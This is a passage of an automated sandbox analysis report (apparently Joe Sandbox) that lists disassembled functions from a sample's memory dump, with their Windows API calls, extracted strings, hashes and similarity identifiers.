                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: SendString_wcslen$BuffCharDriveLowerType
                                                                                                                                                                        • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                                                                                                        • API String ID: 1839972693-4113822522
                                                                                                                                                                        • Opcode ID: 5fabc9727d399a5b437628273954aebe6ba44a136b8c89ca2077cbfe09468ba8
                                                                                                                                                                        • Instruction ID: 4dfb501ad853c23c2d2e9fc05a698e9ef5bdfb8311ab9258e06a818125d273b0
                                                                                                                                                                        • Opcode Fuzzy Hash: 5fabc9727d399a5b437628273954aebe6ba44a136b8c89ca2077cbfe09468ba8
                                                                                                                                                                        • Instruction Fuzzy Hash: ED71D0325282128FC710EF34D89096AB7E4FF58768F10492EF89697361EB31DD95CB81
                                                                                                                                                                        Function 002C6382 Relevance: 27.2, APIs: 18, Instructions: 198windowtimeCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • LoadIconW.USER32(00000063), ref: 002C6395
                                                                                                                                                                        • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 002C63A7
                                                                                                                                                                        • SetWindowTextW.USER32(?,?), ref: 002C63BE
                                                                                                                                                                        • GetDlgItem.USER32(?,000003EA), ref: 002C63D3
                                                                                                                                                                        • SetWindowTextW.USER32(00000000,?), ref: 002C63D9
                                                                                                                                                                        • GetDlgItem.USER32(?,000003E9), ref: 002C63E9
                                                                                                                                                                        • SetWindowTextW.USER32(00000000,?), ref: 002C63EF
                                                                                                                                                                        • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 002C6410
                                                                                                                                                                        • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 002C642A
                                                                                                                                                                        • GetWindowRect.USER32(?,?), ref: 002C6433
                                                                                                                                                                        • _wcslen.LIBCMT ref: 002C649A
                                                                                                                                                                        • SetWindowTextW.USER32(?,?), ref: 002C64D6
                                                                                                                                                                        • GetDesktopWindow.USER32 ref: 002C64DC
                                                                                                                                                                        • GetWindowRect.USER32(00000000), ref: 002C64E3
                                                                                                                                                                        • MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 002C653A
                                                                                                                                                                        • GetClientRect.USER32(?,?), ref: 002C6547
                                                                                                                                                                        • PostMessageW.USER32(?,00000005,00000000,?), ref: 002C656C
                                                                                                                                                                        • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 002C6596
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 895679908-0
                                                                                                                                                                        • Opcode ID: f614f63a43053796f453ae23dd4659df4c16a57662c29953357707aca044a22a
                                                                                                                                                                        • Instruction ID: 8e5265f2e500ddf045da7a1aa73abefa1f802e9e04b9998a30a152eaddb8841e
                                                                                                                                                                        • Opcode Fuzzy Hash: f614f63a43053796f453ae23dd4659df4c16a57662c29953357707aca044a22a
                                                                                                                                                                        • Instruction Fuzzy Hash: D6718C31900606AFDB20DFA8DE49FAEBBF5FF48744F10062CE186A25A0D775E954CB50
                                                                                                                                                                        Function 002E086B Relevance: 27.1, APIs: 18, Instructions: 128COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • LoadCursorW.USER32(00000000,00007F89), ref: 002E0884
                                                                                                                                                                        • LoadCursorW.USER32(00000000,00007F8A), ref: 002E088F
                                                                                                                                                                        • LoadCursorW.USER32(00000000,00007F00), ref: 002E089A
                                                                                                                                                                        • LoadCursorW.USER32(00000000,00007F03), ref: 002E08A5
                                                                                                                                                                        • LoadCursorW.USER32(00000000,00007F8B), ref: 002E08B0
                                                                                                                                                                        • LoadCursorW.USER32(00000000,00007F01), ref: 002E08BB
                                                                                                                                                                        • LoadCursorW.USER32(00000000,00007F81), ref: 002E08C6
                                                                                                                                                                        • LoadCursorW.USER32(00000000,00007F88), ref: 002E08D1
                                                                                                                                                                        • LoadCursorW.USER32(00000000,00007F80), ref: 002E08DC
                                                                                                                                                                        • LoadCursorW.USER32(00000000,00007F86), ref: 002E08E7
                                                                                                                                                                        • LoadCursorW.USER32(00000000,00007F83), ref: 002E08F2
                                                                                                                                                                        • LoadCursorW.USER32(00000000,00007F85), ref: 002E08FD
                                                                                                                                                                        • LoadCursorW.USER32(00000000,00007F82), ref: 002E0908
                                                                                                                                                                        • LoadCursorW.USER32(00000000,00007F84), ref: 002E0913
                                                                                                                                                                        • LoadCursorW.USER32(00000000,00007F04), ref: 002E091E
                                                                                                                                                                        • LoadCursorW.USER32(00000000,00007F02), ref: 002E0929
                                                                                                                                                                        • GetCursorInfo.USER32(?), ref: 002E0939
                                                                                                                                                                        • GetLastError.KERNEL32 ref: 002E097B
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Cursor$Load$ErrorInfoLast
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3215588206-0
                                                                                                                                                                        • Opcode ID: 8641780a756a573d15320f528216bb270de3d19cf6906de5fc5a99ddff4a9387
                                                                                                                                                                        • Instruction ID: d86b87c50cb3da6f535e7bd0641e34835ca14eb3987e6463b42f0d44c0d241cd
                                                                                                                                                                        • Opcode Fuzzy Hash: 8641780a756a573d15320f528216bb270de3d19cf6906de5fc5a99ddff4a9387
                                                                                                                                                                        • Instruction Fuzzy Hash: 63415470D4835A6ADB109FBA8CC986EBFE8FF04754B50452AE11CE7282DB789841CF91
                                                                                                                                                                        Function 002C3A43 Relevance: 26.6, APIs: 8, Strings: 7, Instructions: 400COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _wcslen
                                                                                                                                                                        • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT$k2
                                                                                                                                                                        • API String ID: 176396367-4155453453
                                                                                                                                                                        • Opcode ID: 349a8ebb5fd4279394e009bfc65a3f7d521bee15e6c107463af6207756e3fd60
                                                                                                                                                                        • Instruction ID: 322cdc263a988cda31560ea7aac8c9183968faf2629991f56c2dd0fc823a545f
                                                                                                                                                                        • Opcode Fuzzy Hash: 349a8ebb5fd4279394e009bfc65a3f7d521bee15e6c107463af6207756e3fd60
                                                                                                                                                                        • Instruction Fuzzy Hash: F3E1C532A205269BCB14DFB4C851BEDFBB5BF14710F10CA1EE456E7250DB30AEA59B90
                                                                                                                                                                        Function 002F9B7A Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 181windowfileCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 0026249F: GetWindowLongW.USER32(00000000,000000EB), ref: 002624B0
                                                                                                                                                                        • DragQueryPoint.SHELL32(?,?), ref: 002F9BA3
                                                                                                                                                                          • Part of subcall function 002F80AE: ClientToScreen.USER32(?,?), ref: 002F80D4
                                                                                                                                                                          • Part of subcall function 002F80AE: GetWindowRect.USER32(?,?), ref: 002F814A
                                                                                                                                                                          • Part of subcall function 002F80AE: PtInRect.USER32(?,?,?), ref: 002F815A
                                                                                                                                                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 002F9C0C
                                                                                                                                                                        • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 002F9C17
                                                                                                                                                                        • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 002F9C3A
                                                                                                                                                                        • SendMessageW.USER32(?,000000C2,00000001,?), ref: 002F9C81
                                                                                                                                                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 002F9C9A
                                                                                                                                                                        • SendMessageW.USER32(?,000000B1,?,?), ref: 002F9CB1
                                                                                                                                                                        • SendMessageW.USER32(?,000000B1,?,?), ref: 002F9CD3
                                                                                                                                                                        • DragFinish.SHELL32(?), ref: 002F9CDA
                                                                                                                                                                        • DefDlgProcW.USER32(?,00000233,?,00000000), ref: 002F9DCD
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
                                                                                                                                                                        • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$(3$(3
                                                                                                                                                                        • API String ID: 221274066-3044128499
                                                                                                                                                                        • Opcode ID: 80f674eebe072765f717259ab89ab837cbc8a021787948d1153b41636e5da709
                                                                                                                                                                        • Instruction ID: e73e5969504d40bd924b48c957781431c831c3922a85a68d554550da97ef8318
                                                                                                                                                                        • Opcode Fuzzy Hash: 80f674eebe072765f717259ab89ab837cbc8a021787948d1153b41636e5da709
                                                                                                                                                                        • Instruction Fuzzy Hash: 6B619C71518305AFC302EF50DC85EAFFBE9EF88750F00092DF691961A1DB309699CB52
                                                                                                                                                                        Function 00280436 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 81COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • __scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 00280436
                                                                                                                                                                          • Part of subcall function 0028045D: InitializeCriticalSectionAndSpinCount.KERNEL32(0033170C,00000FA0,955C87BD,?,?,?,?,002A2733,000000FF), ref: 0028048C
                                                                                                                                                                          • Part of subcall function 0028045D: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,002A2733,000000FF), ref: 00280497
                                                                                                                                                                          • Part of subcall function 0028045D: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,002A2733,000000FF), ref: 002804A8
                                                                                                                                                                          • Part of subcall function 0028045D: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 002804BE
                                                                                                                                                                          • Part of subcall function 0028045D: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 002804CC
                                                                                                                                                                          • Part of subcall function 0028045D: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 002804DA
                                                                                                                                                                          • Part of subcall function 0028045D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00280505
                                                                                                                                                                          • Part of subcall function 0028045D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00280510
                                                                                                                                                                        • ___scrt_fastfail.LIBCMT ref: 00280457
                                                                                                                                                                          • Part of subcall function 00280413: __onexit.LIBCMT ref: 00280419
                                                                                                                                                                        Strings
                                                                                                                                                                        • InitializeConditionVariable, xrefs: 002804B8
                                                                                                                                                                        • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00280492
                                                                                                                                                                        • SleepConditionVariableCS, xrefs: 002804C4
                                                                                                                                                                        • kernel32.dll, xrefs: 002804A3
                                                                                                                                                                        • WakeAllConditionVariable, xrefs: 002804D2
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
                                                                                                                                                                        • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                                                                                                                        • API String ID: 66158676-1714406822
                                                                                                                                                                        • Opcode ID: e29bb8517c699615a4db0a44ffe571ac4ac3a0e8f94512e822c2df019f49e804
                                                                                                                                                                        • Instruction ID: fc0c41371c37c0aca5e14c84876da247f2f2fa4bcd6a32d02d6981a8a2c9a204
                                                                                                                                                                        • Opcode Fuzzy Hash: e29bb8517c699615a4db0a44ffe571ac4ac3a0e8f94512e822c2df019f49e804
                                                                                                                                                                        • Instruction Fuzzy Hash: 7121263AA527056BD7623BA4AC9ABAA7399EB05BB1F040125F905932C0DF748C058F70
                                                                                                                                                                        Function 002D4F05 Relevance: 24.8, APIs: 7, Strings: 7, Instructions: 309COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • CharLowerBuffW.USER32(00000000,00000000,002FDCD0), ref: 002D4F6C
                                                                                                                                                                        • _wcslen.LIBCMT ref: 002D4F80
                                                                                                                                                                        • _wcslen.LIBCMT ref: 002D4FDE
                                                                                                                                                                        • _wcslen.LIBCMT ref: 002D5039
                                                                                                                                                                        • _wcslen.LIBCMT ref: 002D5084
                                                                                                                                                                        • _wcslen.LIBCMT ref: 002D50EC
                                                                                                                                                                          • Part of subcall function 0027FD52: _wcslen.LIBCMT ref: 0027FD5D
                                                                                                                                                                        • GetDriveTypeW.KERNEL32(?,00327C10,00000061), ref: 002D5188
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _wcslen$BuffCharDriveLowerType
                                                                                                                                                                        • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                                                                                                                        • API String ID: 2055661098-1000479233
                                                                                                                                                                        • Opcode ID: caf2100682950bb7762d0d9762f45bcfb2a5956718ade6b7632d631c942a723b
                                                                                                                                                                        • Instruction ID: b192d2108901760060973fea50e0cd92b88ac06bf06e1813f0452a93e4fb93bc
                                                                                                                                                                        • Opcode Fuzzy Hash: caf2100682950bb7762d0d9762f45bcfb2a5956718ade6b7632d631c942a723b
                                                                                                                                                                        • Instruction Fuzzy Hash: 8BB1D7316287229FC710EF28C890A6AB7E5BF94714F50491EF596C7391D7B0DCA4CB92
                                                                                                                                                                        Function 002EBA59 Relevance: 24.4, APIs: 16, Instructions: 418processCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • _wcslen.LIBCMT ref: 002EBBF8
                                                                                                                                                                        • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 002EBC10
                                                                                                                                                                        • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 002EBC34
                                                                                                                                                                        • _wcslen.LIBCMT ref: 002EBC60
                                                                                                                                                                        • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 002EBC74
                                                                                                                                                                        • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 002EBC96
                                                                                                                                                                        • _wcslen.LIBCMT ref: 002EBD92
                                                                                                                                                                          • Part of subcall function 002D0F4E: GetStdHandle.KERNEL32(000000F6), ref: 002D0F6D
                                                                                                                                                                        • _wcslen.LIBCMT ref: 002EBDAB
                                                                                                                                                                        • _wcslen.LIBCMT ref: 002EBDC6
                                                                                                                                                                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 002EBE16
                                                                                                                                                                        • GetLastError.KERNEL32(00000000), ref: 002EBE67
                                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 002EBE99
                                                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 002EBEAA
                                                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 002EBEBC
                                                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 002EBECE
                                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 002EBF43
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2178637699-0
                                                                                                                                                                        • Opcode ID: e1a691c8a4112b8788f9b823ea3096ae42d94af48d97e11d4c79dd1ecaed2211
                                                                                                                                                                        • Instruction ID: 5367b27bed894bd3d03a0cb66c14da2231cac011dec465810d7c8b99839dea56
                                                                                                                                                                        • Opcode Fuzzy Hash: e1a691c8a4112b8788f9b823ea3096ae42d94af48d97e11d4c79dd1ecaed2211
                                                                                                                                                                        • Instruction Fuzzy Hash: 25F1E0315283419FC715EF25C891B6BBBE5AF85310F18855EF8894B2A2CB70EC60CF92
                                                                                                                                                                        Function 002E4A46 Relevance: 23.2, APIs: 11, Strings: 2, Instructions: 478libraryloaderCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,002FDCD0), ref: 002E4B18
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 002E4B2A
                                                                                                                                                                        • GetModuleFileNameW.KERNEL32(?,?,00000104,?,?,?,002FDCD0), ref: 002E4B4F
                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,002FDCD0), ref: 002E4B9B
                                                                                                                                                                        • StringFromGUID2.OLE32(?,?,00000028,?,002FDCD0), ref: 002E4C05
                                                                                                                                                                        • SysFreeString.OLEAUT32(00000009), ref: 002E4CBF
                                                                                                                                                                        • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 002E4D25
                                                                                                                                                                        • SysFreeString.OLEAUT32(?), ref: 002E4D4F
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FreeString$Library$AddressFileFromLoadModuleNamePathProcQueryType
                                                                                                                                                                        • String ID: GetModuleHandleExW$kernel32.dll
                                                                                                                                                                        • API String ID: 354098117-199464113
                                                                                                                                                                        • Opcode ID: 756284c91563de9957186cb17ce5e34be9e7fdb730285122791915d55d7a7617
                                                                                                                                                                        • Instruction ID: 73f53c78f8e610254d6014871a932981905b84895369015f8ff60522de26c1c5
                                                                                                                                                                        • Opcode Fuzzy Hash: 756284c91563de9957186cb17ce5e34be9e7fdb730285122791915d55d7a7617
                                                                                                                                                                        • Instruction Fuzzy Hash: DE127E71A10145EFCB14DF55C888EAEB7B5FF45718F648098F8099B251D731ED52CBA0
                                                                                                                                                                        Function 0026381F Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 214windowCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetMenuItemCount.USER32(003329C0), ref: 002A3F72
                                                                                                                                                                        • GetMenuItemCount.USER32(003329C0), ref: 002A4022
                                                                                                                                                                        • GetCursorPos.USER32(?), ref: 002A4066
                                                                                                                                                                        • SetForegroundWindow.USER32(00000000), ref: 002A406F
                                                                                                                                                                        • TrackPopupMenuEx.USER32(003329C0,00000000,?,00000000,00000000,00000000), ref: 002A4082
                                                                                                                                                                        • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 002A408E
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
                                                                                                                                                                        • String ID: 0
                                                                                                                                                                        • API String ID: 36266755-4108050209
                                                                                                                                                                        • Opcode ID: d3f787031323436ddff2a81b6fc2bb24353c5f5ae9296e1a74daba8e29e99922
                                                                                                                                                                        • Instruction ID: 2c9e6f70dcd27ee1669353168228cbb6478b7a843e2e4a5e300451eb2e37452d
                                                                                                                                                                        • Opcode Fuzzy Hash: d3f787031323436ddff2a81b6fc2bb24353c5f5ae9296e1a74daba8e29e99922
                                                                                                                                                                        • Instruction Fuzzy Hash: 4C71F630664206BFEB21DF68DC49FAAFF69FF06364F200216F614A61D1CBB19960DB50
                                                                                                                                                                        Function 002F7711 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 194windowCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • DestroyWindow.USER32(00000000,?), ref: 002F7823
                                                                                                                                                                          • Part of subcall function 00268577: _wcslen.LIBCMT ref: 0026858A
                                                                                                                                                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 002F7897
                                                                                                                                                                        • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 002F78B9
                                                                                                                                                                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 002F78CC
                                                                                                                                                                        • DestroyWindow.USER32(?), ref: 002F78ED
                                                                                                                                                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00260000,00000000), ref: 002F791C
                                                                                                                                                                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 002F7935
                                                                                                                                                                        • GetDesktopWindow.USER32 ref: 002F794E
                                                                                                                                                                        • GetWindowRect.USER32(00000000), ref: 002F7955
                                                                                                                                                                        • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 002F796D
                                                                                                                                                                        • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 002F7985
                                                                                                                                                                          • Part of subcall function 00262234: GetWindowLongW.USER32(?,000000EB), ref: 00262242
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
